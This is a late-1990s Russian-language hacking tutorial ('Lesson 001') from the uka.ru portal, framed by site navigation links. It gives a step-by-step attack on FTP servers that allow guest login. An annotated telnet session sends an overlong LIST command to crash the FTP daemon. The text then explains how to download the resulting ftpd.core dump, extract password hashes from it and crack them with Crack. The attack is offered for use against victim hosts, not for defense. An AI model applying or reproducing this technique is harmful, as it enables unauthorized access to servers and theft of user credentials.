2211
| ЗНАКОМСТВА | UKA.ru | Gossip.ru |Библиотека бесплатно! | massovka | vaticancitystate.ru | взрывЧАТка From 24.11.97
Lesson 001
----------

Цель: получение паролей account'ов, находящихся на сервере, допускающем guest
 telnet-вход при использовании ftp-хоста. Действует на 50% систем.

Значит, ниже приведен тип лога, при использовании этой атаки. Работает, что, ко-
нечно-же проверено. Возможно на 40-50% систем, причем в основном администриру-
емые BSD-хостами.

bash$ telnet victim.host ftp
Trying xxx.xxx.xxx.xxx...
Connected to victim.host.
Escape character is '^]'.
220 victim.host FTP server ready.
user root
530 User root access denied...
user ftp
331 Guest login ok, send your complete e-mail address as password.
pass aaa@
230 Guest login ok, access restriction apply.
cwd incoming
250 CWD command successful.
list x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x
 x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x  
 x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x  
Connection closed by foreign host.

Если все так и выглядит, значит ftp daemon на этом хосте свалилися в
core. Core - это образ памяти, который содержит, как правило, достаточно
большой кусок passwd. Причем не важно, стоит ли на хосте shadow password,
или не стоит. Осталось только найти и скачать его ;)
Почему это срабатывает в 50% случаев - именно потому, что core далеко
не всегда валится в incoming. Это зависит от версии операционки и версии
ftp daemona. Может еще от фазы луны, я не знаю ;)
Теперь заходим простым FTP клиентом и ищем в директории incoming или в
корневой директории файл ftpd.core. Если он есть - скачиваем его себе.
Если все это удалось - очень хорошо. Смотрим этот файл, выдираем из
него пароли (они очень характерно выглядят) и напускаем на него Crack.
Т.е. ломаем методом подбора. Чем больше пользователей и больше словари -
тем больше вероятность подобрать. В моем случае из ~25 паролей я подобрал
два.

PS. Вход через telnet возможен и на 21 порт, то-есть порт ftp-протокола.

PPS. Thanks to Roger
123123
| ЗНАКОМСТВА | UKA.ru | Gossip.ru | lib.uka.ru | Flash memory: SD, MMC, miniSD, CF | взрывЧАТка From 24.11.97
uka.ru